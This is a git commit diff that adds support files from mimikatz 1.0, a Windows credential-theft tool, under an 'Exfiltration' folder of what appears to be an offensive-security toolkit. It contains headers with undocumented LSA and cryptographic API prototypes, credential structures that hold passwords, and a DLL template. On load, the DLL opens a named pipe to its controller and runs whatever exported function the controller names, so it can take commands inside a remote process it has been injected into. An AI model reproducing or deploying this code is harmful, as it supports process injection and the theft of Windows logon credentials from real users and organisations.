aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/commun
diff options
context:
space:
mode:
Diffstat (limited to 'Exfiltration/mimikatz-1.0/commun')
-rw-r--r--Exfiltration/mimikatz-1.0/commun/globdefs.h128
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_32.icobin0 -> 4286 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_48.icobin0 -> 9662 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.icobin0 -> 1150 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_32.icobin0 -> 4286 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_48.icobin0 -> 9662 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.icobin0 -> 4286 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.icobin0 -> 9662 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/kmodel.cpp139
-rw-r--r--Exfiltration/mimikatz-1.0/commun/kmodel.h21
-rw-r--r--Exfiltration/mimikatz-1.0/commun/secpkg.h239
16 files changed, 527 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/commun/globdefs.h b/Exfiltration/mimikatz-1.0/commun/globdefs.h
new file mode 100644
index 0000000..d579a3b
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/globdefs.h
@@ -0,0 +1,128 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#pragma warning(disable:4530)
+#include <stdio.h>
+#include <windows.h>
+#include <ntsecapi.h>
+#include <string>
+#include <vector>
+using namespace std;
+
+#define SECURITY_WIN32
+#define PAGE_SIZE 0x1000
+#define MAX_DOMAIN_LEN 24
+#define MAX_USERNAME_LEN 24
+
+#define MIMIKATZ L"mimikatz"
+#ifdef _M_X64
+ #define MIMIKATZ_FULL L"mimikatz 1.0 x64 (RC)"
+#else ifdef
+ #define MIMIKATZ_FULL L"mimikatz 1.0 x86 (RC)"
+#endif
+
+#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
+#define NT_INFORMATION(Status) ((((ULONG)(Status)) >> 30) == 1)
+#define NT_WARNING(Status) ((((ULONG)(Status)) >> 30) == 2)
+#define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3)
+
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+#define STATUS_MORE_ENTRIES ((NTSTATUS)0x00000105L)
+
+#define S_SWAP(a, b) {BYTE t = S[a]; S[a] = S[b]; S[b] = t;}
+
+typedef bool (* PKIWI_LOCAL_COMMAND) (vector<wstring> * arguments);
+
+typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND {
+ PKIWI_LOCAL_COMMAND ptrCommand;
+ wstring commandName;
+ wstring commandHelp;
+ _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name, wstring help) : ptrCommand(command), commandName(name), commandHelp(help) {}
+ _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name) : ptrCommand(command), commandName(name), commandHelp() {}
+} KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND, *PKIWI_MIMIKATZ_LOCAL_MODULE_COMMAND;
+
+typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE {
+ wstring module;
+ wstring description;
+ vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> commandes;
+ _KIWI_MIMIKATZ_LOCAL_MODULE(wstring leModule, wstring laDescription, vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> lesCommandes) : module(leModule), description(laDescription), commandes(lesCommandes) {}
+} KIWI_MIMIKATZ_LOCAL_MODULE, *PKIWI_MIMIKATZ_LOCAL_MODULE;
+
+typedef struct _CLIENT_ID {
+ PVOID UniqueProcess;
+ PVOID UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef const ULONG CLONG;
+typedef const UNICODE_STRING *PCUNICODE_STRING;
+typedef STRING OEM_STRING;
+typedef PSTRING POEM_STRING;
+typedef CONST STRING* PCOEM_STRING;
+
+/* System* */
+typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_006) (LPCSTR string, BYTE hash[16]);
+typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_007) (PUNICODE_STRING string, BYTE hash[16]);
+typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_025) (BYTE[16], DWORD *, BYTE[16]);
+typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_027) (BYTE[16], DWORD *, BYTE[16]);
+/* CNG */
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_STORAGE_PROVIDER) (__out NCRYPT_PROV_HANDLE *phProvider, __in_opt LPCWSTR pszProviderName, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_ENUM_KEYS) (__in NCRYPT_PROV_HANDLE hProvider, __in_opt LPCWSTR pszScope, __deref_out NCryptKeyName **ppKeyName, __inout PVOID * ppEnumState, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_KEY) (__in NCRYPT_PROV_HANDLE hProvider, __out NCRYPT_KEY_HANDLE *phKey, __in LPCWSTR pszKeyName, __in DWORD dwLegacyKeySpec, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_EXPORT_KEY) (__in NCRYPT_KEY_HANDLE hKey, __in_opt NCRYPT_KEY_HANDLE hExportKey, __in LPCWSTR pszBlobType, __in_opt NCryptBufferDesc *pParameterList, __out_opt PBYTE pbOutput, __in DWORD cbOutput, __out DWORD *pcbResult, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_GET_PROPERTY) (__in NCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PBYTE pbOutput, __in DWORD cbOutput, __out DWORD * pcbResult, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_BUFFER) (__deref PVOID pvInput);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_OBJECT) (__in NCRYPT_HANDLE hObject);
+typedef NTSTATUS (WINAPI * PBCRYPT_ENUM_REGISTERED_PROVIDERS)(__inout ULONG* pcbBuffer, __deref_opt_inout_bcount_part_opt(*pcbBuffer, *pcbBuffer) PCRYPT_PROVIDERS *ppBuffer);
+typedef VOID (WINAPI * PBCRYPT_FREE_BUFFER) (__in PVOID pvBuffer);
+
+typedef NTSTATUS (WINAPI * PBCRYPT_OPEN_ALGORITHM_PROVIDER) (__out BCRYPT_ALG_HANDLE *phAlgorithm, __in LPCWSTR pszAlgId, __in_opt LPCWSTR pszImplementation, __in ULONG dwFlags);
+typedef NTSTATUS (WINAPI * PBCRYPT_SET_PROPERTY) (__inout BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __in_bcount(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in ULONG dwFlags);
+typedef NTSTATUS (WINAPI * PBCRYPT_GET_PROPERTY) (__in BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags);
+typedef NTSTATUS (WINAPI * PBCRYPT_GENERATE_SYMMETRIC_KEY) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __out BCRYPT_KEY_HANDLE *phKey, __out_bcount_full_opt(cbKeyObject) PUCHAR pbKeyObject, __in ULONG cbKeyObject, __in_bcount(cbSecret) PUCHAR pbSecret, __in ULONG cbSecret, __in ULONG dwFlags);
+typedef NTSTATUS (WINAPI * PBCRYTP_DESTROY_KEY) (__inout BCRYPT_KEY_HANDLE hKey);
+typedef NTSTATUS (WINAPI * PBCRYTP_CLOSE_ALGORITHM_PROVIDER) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __in ULONG dwFlags);
+
+/* Rtl* */
+#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
+typedef NTSTATUS (WINAPI * PRTL_CREATE_USER_THREAD) (__in HANDLE Process, __in_opt PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, __in char Flags, __in_opt ULONG ZeroBits, __in_opt SIZE_T MaximumStackSize, __in_opt SIZE_T CommittedStackSize, __in PTHREAD_START_ROUTINE StartAddress, __in_opt PVOID Parameter, __out_opt PHANDLE Thread, __out_opt PCLIENT_ID ClientId);
+typedef VOID (WINAPI * PRTL_INIT_STRING) (PSTRING DestinationString, PCSTR SourceString);
+typedef VOID (WINAPI * PRTL_INIT_UNICODESTRING) (PUNICODE_STRING DestinationString, PCWSTR SourceString);
+typedef NTSTATUS (WINAPI * PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING) (POEM_STRING DestinationString, PCUNICODE_STRING SourceString, BOOLEAN AllocateDestinationString);
+typedef VOID (WINAPI * PRTL_FREE_OEM_STRING) (POEM_STRING OemString);
+typedef PVOID (WINAPI * PRTL_LOOKUP_ELEMENT_GENERIC_TABLE_AV) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
+typedef enum _RTL_GENERIC_COMPARE_RESULTS (WINAPI * PRTL_AVL_COMPARE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID FirstStruct, __in PVOID SecondStruct);
+typedef PVOID (WINAPI * PRTL_AVL_ALLOCATE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in CLONG ByteSize);
+typedef VOID (WINAPI * PRTL_AVL_FREE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
+
+typedef struct _RTL_BALANCED_LINKS {
+ struct _RTL_BALANCED_LINKS *Parent;
+ struct _RTL_BALANCED_LINKS *LeftChild;
+ struct _RTL_BALANCED_LINKS *RightChild;
+ CHAR Balance;
+ UCHAR Reserved[3];
+} RTL_BALANCED_LINKS;
+typedef RTL_BALANCED_LINKS *PRTL_BALANCED_LINKS;
+
+typedef enum _RTL_GENERIC_COMPARE_RESULTS {
+ GenericLessThan,
+ GenericGreaterThan,
+ GenericEqual
+} RTL_GENERIC_COMPARE_RESULTS;
+
+typedef struct _RTL_AVL_TABLE {
+ RTL_BALANCED_LINKS BalancedRoot;
+ PVOID OrderedPointer;
+ ULONG WhichOrderedElement;
+ ULONG NumberGenericTableElements;
+ ULONG DepthOfTree;
+ PRTL_BALANCED_LINKS RestartKey;
+ ULONG DeleteCount;
+ PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
+ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
+ PRTL_AVL_FREE_ROUTINE FreeRoutine;
+ PVOID TableContext;
+} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
new file mode 100644
index 0000000..9ac92da
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
new file mode 100644
index 0000000..79edffc
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
new file mode 100644
index 0000000..2285d1c
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
new file mode 100644
index 0000000..745963e
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
new file mode 100644
index 0000000..7497143
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
new file mode 100644
index 0000000..07df30f
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
new file mode 100644
index 0000000..67b1100
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
new file mode 100644
index 0000000..6d7f787
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
new file mode 100644
index 0000000..805707a
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
new file mode 100644
index 0000000..a1c08e5
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
new file mode 100644
index 0000000..ea38a48
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
new file mode 100644
index 0000000..27adde3
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.cpp b/Exfiltration/mimikatz-1.0/commun/kmodel.cpp
new file mode 100644
index 0000000..a87ea8f
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/kmodel.cpp
@@ -0,0 +1,139 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "kmodel.h"
+
+HMODULE g_hModule = NULL;
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
+{
+ if (ul_reason_for_call == DLL_PROCESS_ATTACH)
+ {
+ g_hModule = hModule;
+
+ HANDLE hThread = CreateThread(NULL, 0, &ThreadProc, NULL, 0, NULL);
+ if(hThread && hThread != INVALID_HANDLE_VALUE)
+ {
+ return CloseHandle(hThread);
+ }
+ }
+ return TRUE;
+}
+
+DWORD WINAPI ThreadProc(LPVOID lpParameter)
+{
+ mod_pipe * monCommunicator = new mod_pipe(L"kiwi\\mimikatz");
+
+ bool succes = false;
+ for(DWORD nbRetry = 1; nbRetry <= 5 && !succes; nbRetry++)
+ {
+ succes = monCommunicator->createClient();
+ if(!succes)
+ {
+ Sleep(3000);
+ }
+ }
+
+ if(succes)
+ {
+ ptrFunctionString maFonctionString = reinterpret_cast<ptrFunctionString>(GetProcAddress(g_hModule, "getDescription"));
+
+ wstring monBuffer = L"Bienvenue dans un processus distant\n\t\t\tGentil Kiwi";
+ if(maFonctionString)
+ {
+ wstring * maDescription = new wstring();
+ if(maFonctionString(maDescription))
+ {
+ monBuffer.append(L"\n\n");
+ monBuffer.append(*maDescription);
+ }
+ delete maDescription;
+ }
+
+
+
+ if(monCommunicator->writeToPipe(monBuffer))
+ {
+ for(;;)
+ {
+ if(monCommunicator->readFromPipe(monBuffer))
+ {
+ wstring fonction = monBuffer;
+ vector<wstring> arguments;
+
+ size_t monIndex = fonction.find(L' ');
+
+ if(monIndex != wstring::npos)
+ {
+ arguments = mod_parseur::parse(fonction.substr(monIndex + 1));
+ fonction = fonction.substr(0, monIndex);
+ }
+
+ string procDll(fonction.begin(), fonction.end());
+
+ ptrFunction maFonction = reinterpret_cast<ptrFunction>(GetProcAddress(g_hModule, procDll.c_str()));
+
+ if(maFonction)
+ {
+ if(maFonction(monCommunicator, &arguments))
+ {
+ monBuffer = L"@";
+ }
+ else // La fonction à retourné FALSE, il y a donc anomalie bloquante sur le canal
+ {
+ break;
+ }
+ }
+ else
+ {
+ monBuffer = L"@Méthode \'";
+ monBuffer.append(fonction);
+ monBuffer.append(L"\' introuvable !\n");
+ }
+
+ if(!monCommunicator->writeToPipe(monBuffer))
+ {
+ break;
+ }
+ }
+ else
+ {
+ break;
+ }
+ }
+ }
+ }
+
+ delete monCommunicator;
+
+ FreeLibraryAndExitThread(g_hModule, 0);
+ return 0;
+}
+
+bool sendTo(mod_pipe * monPipe, wstring message)
+{
+ wstring reponse = L"#";
+ reponse.append(message);
+
+ return monPipe->writeToPipe(reponse);
+}
+
+
+__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+ bool sendOk = sendTo(monPipe, L"pong");
+
+ for(vector<wstring>::iterator monArgument = mesArguments->begin(); monArgument != mesArguments->end() && sendOk; monArgument++)
+ {
+ wstring maReponse = L" - argument:";
+ maReponse.append(*monArgument);
+ sendOk = sendTo(monPipe, maReponse);
+ }
+
+ if(sendOk)
+ sendOk = sendTo(monPipe, L"\n");
+
+ return sendOk;
+} \ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.h b/Exfiltration/mimikatz-1.0/commun/kmodel.h
new file mode 100644
index 0000000..65bd912
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/kmodel.h
@@ -0,0 +1,21 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "globdefs.h"
+#include "mod_pipe.h"
+#include "mod_parseur.h"
+
+#define __kextdll extern "C" __declspec(dllexport)
+
+typedef bool (__cdecl * ptrFunction) (mod_pipe * monPipe, vector<wstring> * mesArguments);
+typedef bool (__cdecl * ptrFunctionString) (wstring * maDescription);
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
+DWORD WINAPI ThreadProc(LPVOID lpParameter);
+
+bool sendTo(mod_pipe * monPipe, wstring message);
+
+__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments);
diff --git a/Exfiltration/mimikatz-1.0/commun/secpkg.h b/Exfiltration/mimikatz-1.0/commun/secpkg.h
new file mode 100644
index 0000000..385307d
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/secpkg.h
@@ -0,0 +1,239 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+ Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "globdefs.h"
+#include <sspi.h>
+#include <wincred.h>
+
+typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL
+{
+ LSA_UNICODE_STRING UserName;
+ LSA_UNICODE_STRING Domaine;
+ LSA_UNICODE_STRING Password;
+} KIWI_GENERIC_PRIMARY_CREDENTIAL, * PKIWI_GENERIC_PRIMARY_CREDENTIAL;
+
+typedef NTSTATUS (WINAPIV * PLSA_INITIALIZE_PROTECTED_MEMORY) ();
+
+typedef PVOID *PLSA_CLIENT_REQUEST;
+typedef LPTHREAD_START_ROUTINE SEC_THREAD_START;
+typedef LPSECURITY_ATTRIBUTES SEC_ATTRS;
+
+typedef struct _SECPKG_CLIENT_INFO {
+ LUID LogonId; // Effective Logon Id
+ ULONG ProcessID; // Process Id of caller
+ ULONG ThreadID; // Thread Id of caller
+ BOOLEAN HasTcbPrivilege; // Client has TCB
+ BOOLEAN Impersonating; // Client is impersonating
+ BOOLEAN Restricted; // Client is restricted
+ // NT 5.1
+ UCHAR ClientFlags; // Extra flags about the client
+ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; // Impersonation level of client
+ // NT 6
+ HANDLE ClientToken;
+} SECPKG_CLIENT_INFO, * PSECPKG_CLIENT_INFO;
+
+typedef enum _LSA_TOKEN_INFORMATION_TYPE {
+ LsaTokenInformationNull, // Implies LSA_TOKEN_INFORMATION_NULL data type
+ LsaTokenInformationV1, // Implies LSA_TOKEN_INFORMATION_V1 data type
+ LsaTokenInformationV2 // Implies LSA_TOKEN_INFORMATION_V2 data type
+} LSA_TOKEN_INFORMATION_TYPE, *PLSA_TOKEN_INFORMATION_TYPE;
+
+typedef enum _SECPKG_NAME_TYPE {
+ SecNameSamCompatible,
+ SecNameAlternateId,
+ SecNameFlat,
+ SecNameDN,
+ SecNameSPN
+} SECPKG_NAME_TYPE;
+
+typedef struct _SECPKG_CALL_INFO {
+ ULONG ProcessId;
+ ULONG ThreadId;
+ ULONG Attributes;
+ ULONG CallCount;
+ PVOID MechOid; // mechanism objection identifer
+} SECPKG_CALL_INFO, * PSECPKG_CALL_INFO;
+
+typedef enum _SECPKG_SESSIONINFO_TYPE {
+ SecSessionPrimaryCred // SessionInformation is SECPKG_PRIMARY_CRED
+} SECPKG_SESSIONINFO_TYPE;
+
+typedef struct _SECPKG_PRIMARY_CRED {
+ LUID LogonId;
+ UNICODE_STRING DownlevelName; // Sam Account Name
+ UNICODE_STRING DomainName; // Netbios domain name where account is located
+ UNICODE_STRING Password;
+ UNICODE_STRING OldPassword;
+ PSID UserSid;
+ ULONG Flags;
+ UNICODE_STRING DnsDomainName; // DNS domain name where account is located (if known)
+ UNICODE_STRING Upn; // UPN of account (if known)
+ UNICODE_STRING LogonServer;
+ UNICODE_STRING Spare1;
+ UNICODE_STRING Spare2;
+ UNICODE_STRING Spare3;
+ UNICODE_STRING Spare4;
+} SECPKG_PRIMARY_CRED, *PSECPKG_PRIMARY_CRED;
+
+typedef struct _SECPKG_SUPPLEMENTAL_CRED {
+ UNICODE_STRING PackageName;
+ ULONG CredentialSize;
+#ifdef MIDL_PASS
+ [size_is(CredentialSize)]
+#endif // MIDL_PASS
+ PUCHAR Credentials;
+} SECPKG_SUPPLEMENTAL_CRED, *PSECPKG_SUPPLEMENTAL_CRED;
+
+typedef struct _SECPKG_SUPPLEMENTAL_CRED_ARRAY {
+ ULONG CredentialCount;
+#ifdef MIDL_PASS
+ [size_is(CredentialCount)] SECPKG_SUPPLEMENTAL_CRED Credentials[*];
+#else // MIDL_PASS
+ SECPKG_SUPPLEMENTAL_CRED Credentials[1];
+#endif // MIDL_PASS
+} SECPKG_SUPPLEMENTAL_CRED_ARRAY, *PSECPKG_SUPPLEMENTAL_CRED_ARRAY;
+
+typedef NTSTATUS (WINAPI * PLSA_CALLBACK_FUNCTION) (ULONG_PTR Argument1, ULONG_PTR Argument2, PSecBuffer InputBuffer, PSecBuffer OutputBuffer);
+
+typedef NTSTATUS (WINAPI * PLSA_CREATE_LOGON_SESSION) (IN PLUID LogonId);
+typedef NTSTATUS (WINAPI * PLSA_DELETE_LOGON_SESSION) (IN PLUID LogonId);
+typedef NTSTATUS (WINAPI * PLSA_ADD_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue, IN PLSA_STRING Credentials);
+typedef NTSTATUS (WINAPI * PLSA_GET_CREDENTIALS) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN OUT PULONG QueryContext, IN BOOLEAN RetrieveAllCredentials, IN PLSA_STRING PrimaryKeyValue, OUT PULONG PrimaryKeyLength, IN PLSA_STRING Credentials);
+typedef NTSTATUS (WINAPI * PLSA_DELETE_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue);
+typedef PVOID (WINAPI * PLSA_ALLOCATE_LSA_HEAP) (IN ULONG Length);
+typedef VOID (WINAPI * PLSA_FREE_LSA_HEAP) (IN PVOID Base);
+typedef PVOID (WINAPI * PLSA_ALLOCATE_PRIVATE_HEAP) (IN SIZE_T Length);
+typedef VOID (WINAPI * PLSA_FREE_PRIVATE_HEAP) (IN PVOID Base);
+typedef NTSTATUS (WINAPI * PLSA_ALLOCATE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG LengthRequired, OUT PVOID *ClientBaseAddress);
+typedef NTSTATUS (WINAPI * PLSA_FREE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN PVOID ClientBaseAddress);
+typedef NTSTATUS (WINAPI * PLSA_COPY_TO_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID ClientBaseAddress, IN PVOID BufferToCopy);
+typedef NTSTATUS (WINAPI * PLSA_COPY_FROM_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID BufferToCopy, IN PVOID ClientBaseAddress);
+typedef NTSTATUS (WINAPI * PLSA_IMPERSONATE_CLIENT) (VOID);
+typedef NTSTATUS (WINAPI * PLSA_UNLOAD_PACKAGE) (VOID);
+typedef NTSTATUS (WINAPI * PLSA_DUPLICATE_HANDLE) (IN HANDLE SourceHandle, OUT PHANDLE DestionationHandle);
+typedef NTSTATUS (WINAPI * PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS) (IN PLUID LogonId, IN ULONG SupplementalCredSize, IN PVOID SupplementalCreds, IN BOOLEAN Synchronous);
+typedef HANDLE (WINAPI * PLSA_CREATE_THREAD) (IN SEC_ATTRS SecurityAttributes, IN ULONG StackSize, IN SEC_THREAD_START StartFunction, IN PVOID ThreadParameter, IN ULONG CreationFlags, OUT PULONG ThreadId);
+typedef NTSTATUS (WINAPI * PLSA_GET_CLIENT_INFO) (OUT PSECPKG_CLIENT_INFO ClientInfo);
+typedef HANDLE (WINAPI * PLSA_REGISTER_NOTIFICATION) (IN SEC_THREAD_START StartFunction, IN PVOID Parameter, IN ULONG NotificationType, IN ULONG NotificationClass, IN ULONG NotificationFlags, IN ULONG IntervalMinutes, IN OPTIONAL HANDLE WaitEvent);
+typedef NTSTATUS (WINAPI * PLSA_CANCEL_NOTIFICATION) (IN HANDLE NotifyHandle);
+typedef NTSTATUS (WINAPI * PLSA_MAP_BUFFER) (IN PSecBuffer InputBuffer, OUT PSecBuffer OutputBuffer);
+typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthorityName, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
+typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN_EX) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, IN PVOID SessionInformation, IN SECPKG_SESSIONINFO_TYPE SessionInformationType, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
+typedef VOID (WINAPI * PLSA_AUDIT_LOGON) (IN NTSTATUS Status, IN NTSTATUS SubStatus, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthenticatingAuthority, IN PUNICODE_STRING WorkstationName, IN OPTIONAL PSID UserSid, IN SECURITY_LOGON_TYPE LogonType, IN PTOKEN_SOURCE TokenSource, IN PLUID LogonId);
+typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
